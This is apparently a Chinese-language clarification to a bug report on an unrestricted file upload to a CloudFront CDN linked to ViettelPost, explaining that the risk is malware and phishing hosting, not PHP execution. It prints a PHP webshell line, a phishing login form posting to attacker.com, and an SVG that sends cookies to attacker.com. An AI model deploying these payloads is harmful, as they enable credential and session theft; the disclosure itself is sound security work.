# CloudFront不执行PHP - 澄清说明

## ⚠️ 重要澄清

### 误解
❌ "webshell可以在CloudFront上执行命令"

### 事实
✓ **CloudFront是静态CDN，不执行任何服务端代码**

---

## 📝 CloudFront工作原理

### 什么是CloudFront？
```
CloudFront = Amazon Web Services的内容分发网络(CDN)
用途: 全球分发静态内容
功能: 缓存和加速文件传输
```

### CloudFront可以做什么？
✓ 分发图片 (jpg, png, gif)
✓ 分发CSS和JavaScript文件
✓ 分发视频和音频
✓ 分发文档 (pdf, doc, zip)
✓ 分发HTML页面

### CloudFront不能做什么？
❌ 执行PHP代码
❌ 执行Python代码
❌ 执行Java/JSP代码
❌ 连接数据库
❌ 执行服务端逻辑

---

## 🔍 test.php访问流程

### 访问test.php时发生了什么？

```
用户请求: https://d31jjpr2lpclfv.cloudfront.net/test.php
    ↓
CloudFront检查缓存
    ↓
从S3 Bucket获取文件
    ↓
返回文件内容（作为文本）
    ↓
浏览器接收到：
    Content-Type: text/plain
    内容: <?php system($_GET["cmd"]); ?>
    ↓
浏览器显示PHP源代码（不执行）
```

### 浏览器中看到什么？
```
<?php system($_GET["cmd"]); ?>
```
**这只是文本，不会执行！**

---

## 💣 那为什么说是严重漏洞？

### 真正的风险在于：

#### 1. 恶意软件分发 ⚠️⚠️⚠️
```
攻击者可以上传：
- malware.exe (Windows恶意软件)
- trojan.apk (Android木马)
- virus.dmg (Mac病毒)

利用：
- ViettelPost的CloudFront带宽
- 全球CDN加速
- 可信的cloudfront.net域名
- 可能绕过杀毒软件（信任的CDN源）
```

#### 2. 钓鱼攻击 ⚠️⚠️
```html
<!-- 上传钓鱼页面 phishing.html -->
<!DOCTYPE html>
<html>
<head>
  <title>ViettelPost Login</title>
</head>
<body>
  <h1>ViettelPost 员工登录</h1>
  <form action="https://attacker.com/steal" method="POST">
    <input name="username" placeholder="用户名">
    <input type="password" name="password" placeholder="密码">
    <button>登录</button>
  </form>
</body>
</html>
```
**HTML中的JavaScript会执行！**

#### 3. XSS攻击 ⚠️⚠️
```svg
<!-- 上传恶意SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    // 窃取cookies
    document.location='https://attacker.com/steal?cookie='+document.cookie;
  </script>
</svg>
```
**浏览器会执行SVG中的JavaScript！**

#### 4. 品牌滥用 ⚠️
```
上传非法内容：
- 盗版软件
- 色情内容
- 恐怖主义宣传

托管在：d31jjpr2lpclfv.cloudfront.net
相关品牌：ViettelPost

法律风险：ViettelPost可能承担责任
```

---

## 🎯 真实攻击场景

### 场景1: 恶意软件分发
```
1. 攻击者上传: ransomware.exe
2. 获取URL: https://d31jjpr2lpclfv.cloudfront.net/xxx-ransomware.exe
3. 通过钓鱼邮件发送链接
4. 受害者下载并执行
5. 勒索软件加密文件，要求比特币赎金
```

### 场景2: 钓鱼页面
```
1. 攻击者上传: fake-login.html (模仿ViettelPost登录页)
2. 发送邮件："您的账户需要验证，点击登录"
3. 链接指向: https://d31jjpr2lpclfv.cloudfront.net/xxx-fake-login.html
4. 员工输入凭证
5. 凭证发送到攻击者服务器
6. 攻击者获得ViettelPost内网访问权限
```

### 场景3: 供应链攻击
```
1. 攻击者上传: malicious-library.js
2. 诱导开发者在项目中引入
3. 代码注入到ViettelPost应用
4. 窃取用户数据或植入后门
```

---

## 📊 漏洞严重性评估

### 为什么评级为CRITICAL (9.1)？

| 维度 | 评分 | 原因 |
|------|------|------|
| **影响范围** | HIGH | 全球任何人可访问 |
| **攻击难度** | LOW | 仅需硬编码token |
| **文件类型** | CRITICAL | 无任何限制 |
| **内容检测** | NONE | 无恶意软件扫描 |
| **品牌风险** | HIGH | ViettelPost CDN托管 |
| **法律风险** | HIGH | 可能承担法律责任 |

### 不是因为PHP能执行
❌ "webshell可以执行命令"（错误）
✓ "可以托管和分发任意恶意内容"（正确）

---

## ✅ 我的测试

### 测试文件列表
```
1. test.php        - 证明无文件类型限制
2. test.html       - 证明HTML/JS可执行
3. test.svg        - 证明XSS payload可加载
4. test.sh         - 证明可上传脚本
5. test_upload.txt - 基础功能测试
```

### 测试证明了什么？
✓ 无文件类型白名单
✓ 无内容安全检测
✓ 无恶意软件扫描
✓ 文件公开全球分发
✓ 任何持有token的人都能上传

### 我没有做什么？
❌ 上传真实恶意软件
❌ 上传大文件（所有文件<100字节）
❌ 攻击生产系统
❌ 窃取用户数据
❌ 造成服务中断

---

## 🔧 为什么需要修复？

### 如果不修复
```
攻击者可以：
1. 大规模上传恶意软件
2. 创建钓鱼网站农场
3. 托管非法内容
4. 消耗AWS带宽（高额账单）
5. 损害ViettelPost品牌声誉
6. 引发法律诉讼
```

### ViettelPost面临的风险
```
- 声誉损害：客户信任丧失
- 法律风险：托管非法内容的责任
- 财务损失：AWS带宽成本激增
- 监管处罚：违反数据保护法规
- 业务中断：CDN可能被AWS暂停
```

---

## 📝 总结

### CloudFront角色
- ✓ 静态文件CDN
- ❌ 不执行服务端代码

### 漏洞严重性
- ✓ CRITICAL级别
- ✓ 原因：可托管恶意内容，不是PHP能执行

### 我的测试
- ✓ 使用无害PoC文件
- ✓ 立即删除所有文件
- ✓ 记录完整测试过程
- ✓ 提供修复建议

### 澄清
**我不是说webshell可以在CloudFront上执行命令！**
**我是说攻击者可以利用此漏洞托管和分发真实的恶意内容！**

---

**报告时间**: 2025-11-11
**澄清**: CloudFront = 静态CDN，不执行PHP
**风险**: 恶意内容托管和分发

---
